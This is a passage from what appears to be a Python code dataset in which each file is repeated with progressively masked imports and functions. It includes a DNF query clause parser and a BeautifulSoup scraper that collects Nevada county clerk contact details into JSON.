self.elements:\n element.printTree(indent)\n", "<import token>\n<function token>\n<function token>\n\n\nclass TreePrinter:\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n <function token>\n", "<import token>\n<function token>\n<function token>\n<class token>\n" ]
false
43
999de0965efa3c1fe021142a105dcf28184cd5ba
import dnf_converter def parse(query): print("parsing the query...") query = dnf_converter.convert(query) cp_clause_list = [] clause_list = [] for cp in query["$or"]: clauses = [] if "$and" in cp: for clause in cp["$and"]: clauses.append(clause) clause_list.append(clause) else: clause = cp clauses.append(clause) clause_list.append(clause) cp_clause_list.append({ "cp": cp, "clauses": clauses }) return cp_clause_list, clause_list
[ "import dnf_converter\n\ndef parse(query):\n\tprint(\"parsing the query...\")\n\tquery = dnf_converter.convert(query)\n\tcp_clause_list = []\n\tclause_list = []\n\tfor cp in query[\"$or\"]:\n\t\tclauses = []\n\t\tif \"$and\" in cp:\n\t\t\tfor clause in cp[\"$and\"]:\n\t\t\t\tclauses.append(clause)\n\t\t\t\tclause_list.append(clause)\n\t\telse:\n\t\t\tclause = cp\n\t\t\tclauses.append(clause)\n\t\t\tclause_list.append(clause)\n\t\tcp_clause_list.append({ \"cp\": cp, \"clauses\": clauses })\n\treturn cp_clause_list, clause_list", "import dnf_converter\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n", "<import token>\n\n\ndef parse(query):\n print('parsing the query...')\n query = dnf_converter.convert(query)\n cp_clause_list = []\n clause_list = []\n for cp in query['$or']:\n clauses = []\n if '$and' in cp:\n for clause in cp['$and']:\n clauses.append(clause)\n clause_list.append(clause)\n else:\n clause = cp\n clauses.append(clause)\n clause_list.append(clause)\n cp_clause_list.append({'cp': cp, 'clauses': clauses})\n return cp_clause_list, clause_list\n", "<import token>\n<function token>\n" ]
false
44
cb08f64d1ad7e53f1041684d4ca4ef65036c138d
import json import re from bs4 import BeautifulSoup from bs4.element import NavigableString, Tag from common import dir_path def is_element(el, tag): return isinstance(el, Tag) and el.name == tag class ElemIterator(): def __init__(self, els): self.els = els self.i = 0 def peek(self): try: return self.els[self.i] except IndexError: return None def __next__(self): self.i += 1 return self.els[self.i - 1] def hasNext(self): return len(self.els) > (self.i) def peek_till(self, tag): while not is_element(self.peek(), tag): self.__next__() def next_till(self, tag): self.peek_till(tag) self.__next__() def parse_lines(iter_): iter_.peek_till('strong') county = [] while iter_.hasNext(): county += [iter_.__next__()] if is_element(iter_.peek(), 'strong'): yield ElemIterator(county) county = [] yield ElemIterator(county) county = [] def parse_emails_url(iter_): emails = [] url = None try: while True: iter_.peek_till('a') email = iter_.__next__() href = email['href'] if href.startswith('mailto:'): if href[7:]: emails += [href[7:]] else: emails += [email.text] else: url = href except IndexError: pass return emails, url def parse_url(iter_): iter_.peek_till('a') link = iter_.__next__() href = link['href'] assert not href.startswith('mailto:') return [href] def parse_county(iter_): county_title = iter_.__next__().text.strip().title() locale = re.match('(.*) (City|County)', county_title).group(0) if county_title.startswith('Clark County Elections Mailing Address'): emails, url = parse_emails_url(iter_) return { 'locale': locale, 'county': locale, 'emails': emails, } while True: el = iter_.__next__() if isinstance(el, NavigableString): if 'Clerk' in el or 'Registrar' in el: official = el.strip().split(',')[0] break address = [] while True: el = iter_.__next__() if isinstance(el, NavigableString): address += [el.strip()] if re.search(r'Nevada \d{5}', el) or re.search(r'NV \d{5}', el): break el = iter_.__next__() el = iter_.__next__() if isinstance(el, NavigableString): el = el.replace(u'\xa0', ' ') # replace non-breaking space matches1 = re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX (\(\d{3}\) \d{3}-\d{4})', el) matches2 = re.search(r'(\(\d{3}\) \d{3}-VOTE \(\d{4}\)) FAX (\(\d{3}\) \d{3}-\d{4})', el) if matches1: phone = matches1.group(1) fax = matches1.group(2) elif matches2: phone = matches2.group(1) fax = matches2.group(2) else: print(county_title) print(el) print(re.search(r'(\(\d{3}\) \d{3}-\d{4}) FAX', el)) assert False emails, url = parse_emails_url(iter_) init = {'city': locale} if locale.endswith('City') else {'county': locale} return { **init, 'locale': locale, 'official': official, 'address': ', '.join(address), 'emails': list(set(emails)), 'phones': [phone], 'faxes': [fax], 'url': url, } def main(): # Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information # But it's behind a javascript test with open(dir_path(__file__) + '/cache/Nevada.htm') as fh: page = fh.read() soup = BeautifulSoup(page, 'lxml') ps = soup.select('div.content_area > p') iter_ = ElemIterator([x for p in ps for x in p.children]) raw_counties = [parse_county(county) for county in parse_lines(iter_)] merge_counties = {} for county in raw_counties: locale = county['locale'] if locale in merge_counties: merge_counties[locale]['emails'] += county['emails'] else: merge_counties[locale] = county counties = list(merge_counties.values()) assert len(counties) == len(raw_counties) - 1 with open('public/nevada.json', 'w') as fh: json.dump(counties, fh) if __name__ == '__main__': main()
[ "import json\nimport re\nfrom bs4 import BeautifulSoup\nfrom bs4.element import NavigableString, Tag\n\nfrom common import dir_path\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator():\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > (self.i)\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {\n 'locale': locale,\n 'county': locale,\n 'emails': emails,\n }\n\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search(r'Nevada \\d{5}', el) or re.search(r'NV \\d{5}', el):\n break\n\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ') # replace non-breaking space\n matches1 = re.search(r'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el)\n matches2 = re.search(r'(\\(\\d{3}\\) \\d{3}-VOTE \\(\\d{4}\\)) FAX (\\(\\d{3}\\) \\d{3}-\\d{4})', el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search(r'(\\(\\d{3}\\) \\d{3}-\\d{4}) FAX', el))\n assert False\n\n emails, url = parse_emails_url(iter_)\n\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n\n return {\n **init,\n 'locale': locale,\n 'official': official,\n 'address': ', '.join(address),\n 'emails': list(set(emails)),\n 'phones': [phone],\n 'faxes': [fax],\n 'url': url,\n }\n\n\ndef main():\n # Actually this file: https://www.nvsos.gov/sos/elections/voters/county-clerk-contact-information\n # But it's behind a javascript test\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "import json\nimport re\nfrom bs4 import BeautifulSoup\nfrom bs4.element import NavigableString, Tag\nfrom common import dir_path\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\nif __name__ == '__main__':\n main()\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\ndef parse_url(iter_):\n iter_.peek_till('a')\n link = iter_.__next__()\n href = link['href']\n assert not href.startswith('mailto:')\n return [href]\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\ndef main():\n with open(dir_path(__file__) + '/cache/Nevada.htm') as fh:\n page = fh.read()\n soup = BeautifulSoup(page, 'lxml')\n ps = soup.select('div.content_area > p')\n iter_ = ElemIterator([x for p in ps for x in p.children])\n raw_counties = [parse_county(county) for county in parse_lines(iter_)]\n merge_counties = {}\n for county in raw_counties:\n locale = county['locale']\n if locale in merge_counties:\n merge_counties[locale]['emails'] += county['emails']\n else:\n merge_counties[locale] = county\n counties = list(merge_counties.values())\n assert len(counties) == len(raw_counties) - 1\n with open('public/nevada.json', 'w') as fh:\n json.dump(counties, fh)\n\n\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\ndef parse_lines(iter_):\n iter_.peek_till('strong')\n county = []\n while iter_.hasNext():\n county += [iter_.__next__()]\n if is_element(iter_.peek(), 'strong'):\n yield ElemIterator(county)\n county = []\n yield ElemIterator(county)\n county = []\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n\n\ndef parse_emails_url(iter_):\n emails = []\n url = None\n try:\n while True:\n iter_.peek_till('a')\n email = iter_.__next__()\n href = email['href']\n if href.startswith('mailto:'):\n if href[7:]:\n emails += [href[7:]]\n else:\n emails += [email.text]\n else:\n url = href\n except IndexError:\n pass\n return emails, url\n\n\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE \\\\(\\\\d{4}\\\\)) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})'\n , el)\n if matches1:\n phone = matches1.group(1)\n fax = matches1.group(2)\n elif matches2:\n phone = matches2.group(1)\n fax = matches2.group(2)\n else:\n print(county_title)\n print(el)\n print(re.search('(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX', el))\n assert False\n emails, url = parse_emails_url(iter_)\n init = {'city': locale} if locale.endswith('City') else {'county': locale}\n return {**init, 'locale': locale, 'official': official, 'address': ', '\n .join(address), 'emails': list(set(emails)), 'phones': [phone],\n 'faxes': [fax], 'url': url}\n\n\n<function token>\n<code token>\n", "<import token>\n\n\ndef is_element(el, tag):\n return isinstance(el, Tag) and el.name == tag\n\n\nclass ElemIterator:\n\n def __init__(self, els):\n self.els = els\n self.i = 0\n\n def peek(self):\n try:\n return self.els[self.i]\n except IndexError:\n return None\n\n def __next__(self):\n self.i += 1\n return self.els[self.i - 1]\n\n def hasNext(self):\n return len(self.els) > self.i\n\n def peek_till(self, tag):\n while not is_element(self.peek(), tag):\n self.__next__()\n\n def next_till(self, tag):\n self.peek_till(tag)\n self.__next__()\n\n\n<function token>\n<function token>\n<function token>\n\n\ndef parse_county(iter_):\n county_title = iter_.__next__().text.strip().title()\n locale = re.match('(.*) (City|County)', county_title).group(0)\n if county_title.startswith('Clark County Elections Mailing Address'):\n emails, url = parse_emails_url(iter_)\n return {'locale': locale, 'county': locale, 'emails': emails}\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n if 'Clerk' in el or 'Registrar' in el:\n official = el.strip().split(',')[0]\n break\n address = []\n while True:\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n address += [el.strip()]\n if re.search('Nevada \\\\d{5}', el) or re.search('NV \\\\d{5}', el):\n break\n el = iter_.__next__()\n el = iter_.__next__()\n if isinstance(el, NavigableString):\n el = el.replace(u'\\xa0', ' ')\n matches1 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4}) FAX (\\\\(\\\\d{3}\\\\) \\\\d{3}-\\\\d{4})', el\n )\n matches2 = re.search(\n '(\\\\(\\\\d{3}\\\\) \\\\d{3}-VOTE 